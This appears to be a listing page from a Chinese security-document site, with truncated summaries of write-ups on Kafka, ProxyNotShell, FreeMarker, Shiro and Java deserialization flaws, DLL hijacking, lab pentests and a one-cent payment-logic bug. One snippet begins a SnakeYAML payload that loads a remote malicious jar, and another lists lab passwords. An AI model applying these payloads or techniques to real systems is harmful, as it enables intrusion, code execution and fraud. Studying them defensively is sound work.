爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)

# Apache Kafka 远程代码执行漏洞分析及防护指南 (CVE-2023-25194) ## 漏洞概述 Apache Kafka是一个分布式数据流处理平台，能够实时发布、订阅、存储和处理数据流。Kafka Connect是Kafka的一个组件，用于在Kafka和其他系统之间可扩展、可靠地流式传输数据。该漏洞存在于Kafka Connect worker中，攻击者可以利用基于SASL/JAAS配置和SASL协议的任意Kafka客户端，在创建或修改连接器时，通过构造特殊的配置进行JN

2025-08-24 13:55:19

Proxynotshell 反序列化及 CVE-2023-21707 漏洞研究

# PowerShell 反序列化漏洞深度分析：Proxynotshell 与 CVE-2023-21707 ## 漏洞概述本文深入分析两个关键的 PowerShell 反序列化漏洞：Proxynotshell 和 CVE-2023-21707。这两个漏洞都利用了 PowerShell 序列化/反序列化机制中的缺陷，最终导致远程代码执行。 ## 核心漏洞原理 ### PowerShell 反序列化流程 PowerShell 处理 XML 数据的基本流程： 1. XML 信息传入后被

2025-08-24 13:54:22

FreeMarker入门到简要分析模版注入

# FreeMarker模板引擎从入门到安全分析 ## 一、FreeMarker简介 FreeMarker是一款模板引擎，基于模板和要改变的数据生成输出文本（HTML网页、电子邮件、配置文件、源代码等）。它不是面向最终用户，而是一个Java类库，是程序员可以嵌入到开发产品中的组件。 ### 主要特点： - 使用专用语言FreeMarker Template Language (FTL) - 专注于数据展示，业务逻辑在模板外处理 - 语法类似JSP的EL表达式或Thymeleaf，使用`${

2025-08-24 13:53:00

Shiro从入门到权限绕过漏洞

# Apache Shiro 从入门到权限绕过漏洞分析 ## 一、Shiro 简介 Apache Shiro 是一个强大且易用的 Java 安全框架，用于身份验证、授权、加密和会话管理。它可以用于保护任何应用程序，从命令行应用程序、移动应用程序到大型的 Web 和企业应用程序。 ### Shiro 的核心架构 Shiro 架构由以下几个核心组件组成： 1. **Subject**：代表当前用户或当前程序，是一个接口，定义了认证和授权的方法 - 认证：判断用户是否为合法用户的过程

2025-08-24 13:51:52

Java反序列化之反射&URLDNS链审计

# Java反序列化之反射&URLDNS链审计教学文档 ## 一、Java序列化和反序列化基础 ### 1. 基本概念 - **序列化**：将Java对象转换为字节序列的过程 - **反序列化**：把字节序列恢复为Java对象的过程 ### 2. 主要用途 1. 实现数据持久化，将对象永久保存到硬盘 2. 实现远程通信，在网络上传送对象字节序列 3. 应用场景： - 将内存中的对象保存到文件或数据库 - 使用套接字在网络上传送对象 - 通过RMI传输对象 ### 3

2025-08-24 13:50:42

JAVA安全初探(三):CC1链全分析

# Java安全研究：CC1反序列化漏洞链全面分析 ## 一、环境准备 ### 1. JDK配置 - 使用JDK 8u65版本 - 配置到IDEA中：文件 → 项目结构 → SDK → 添加JDK路径 ### 2. Maven依赖 ```xml commons-collections commons-collections 3.2.1 ``` ### 3. JDK源码配置 1. 下载JDK源码：https://hg.

2025-08-24 13:49:18

曲折的命令执行回显

# 曲折的命令执行回显技术详解 ## 0x01 背景与发现在渗透测试过程中发现了一处若依(RuoYi)系统漏洞，该系统版本为4.2。进入后台后尝试常规攻击方法失败，但通过曲折的方式最终实现了命令执行和回显。 ## 0x02 初始攻击尝试 ### 2.1 内存马注入尝试使用Yaml反序列化加载恶意jar包： ```java org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLC

2025-08-24 13:48:19

dll劫持入门

# DLL劫持技术详解 ## 一、DLL劫持基础概念 DLL劫持(DLL Hijacking)是一种利用Windows系统DLL加载机制的安全漏洞攻击技术。攻击者通过将恶意DLL放置在应用程序搜索路径中优先级较高的位置，使得应用程序在运行时加载恶意DLL而非合法的系统DLL。 ### Windows DLL加载机制 Windows操作系统通过以下两种机制确定应用程序调用的DLL路径： 1. **DLL路径搜索目录顺序**： - 程序所在目录 - 程序加载目录(SetCurr

2025-08-24 13:47:37

记一次校内站点的渗透测试

# 校内站点渗透测试教学文档 ## 前言本文档基于一次对校内获奖申报平台的渗透测试实例，详细记录了测试过程中发现的多个高危漏洞，包括越权访问、任意文件上传、任意文件下载和任意用户添加等。这些漏洞的发现和利用过程将作为教学案例，帮助安全人员理解常见Web应用漏洞的检测和利用方法。 ## 0x01 越权漏洞 ### 漏洞发现 1. 首先在申报平台添加一次申报记录 2. 点击编辑功能并抓包（使用Burp Suite等工具） 3. 观察请求参数，发现使用`id`参数控制返回的数据 ### 漏洞

2025-08-24 13:46:30

渗透靶场——vulntarget-a综合靶场

# Vulntarget-A 综合靶场渗透教学文档 ## 靶场环境概述 - **Win7系统**: - 密码: admin - 设置通达OA漏洞 - 入站规则开放80端口 - 存在永恒之蓝漏洞 - 网络配置: 动态外网IP(NAT模式), 静态内网IP - **Win2016系统**: - 账号: vulntarget\win2016 - 密码: Admin#123 - 管理员(administrator)密码: Admin@123 - 已安装Redis

2025-08-24 13:35:46

记一次测试过程中登录参数加密逆向分析

# 登录参数加密逆向分析教学文档 ## 1. 前言在渗透测试过程中，经常会遇到前端对登录参数进行加密的情况。本文将通过一个实际案例，详细讲解如何对登录框中的密码加密参数进行逆向分析，并实现加密算法的复现。 ## 2. 环境准备 ### 2.1 工具准备 - 浏览器开发者工具（Chrome/Firefox） - Python 3.x - Node.js（用于运行前端JS代码） - 代码编辑器（VS Code等） ### 2.2 库准备 - Python: `pycryptodome`

2025-08-24 13:34:38

记一次公众号商城服务1分钱购物漏洞

# 微信公众号商城支付漏洞分析与利用教学 ## 1. 漏洞概述本教学文档详细分析了一种常见的微信公众号商城支付逻辑漏洞，即"1分钱购物"漏洞。该漏洞允许攻击者通过修改订单金额参数，以极低价格（如0.01元）购买高价值商品或服务。 ## 2. 漏洞原理 ### 2.1 漏洞本质 - **服务端未验证订单金额**：后端系统未对前端提交的订单金额进行二次验证 - **信任客户端数据**：完全信任客户端提交的金额参数，未与商品实际价格进行比对 - **缺乏完整性校验**：没有使用签名机制确保订

2025-08-24 13:33:45

跳转到页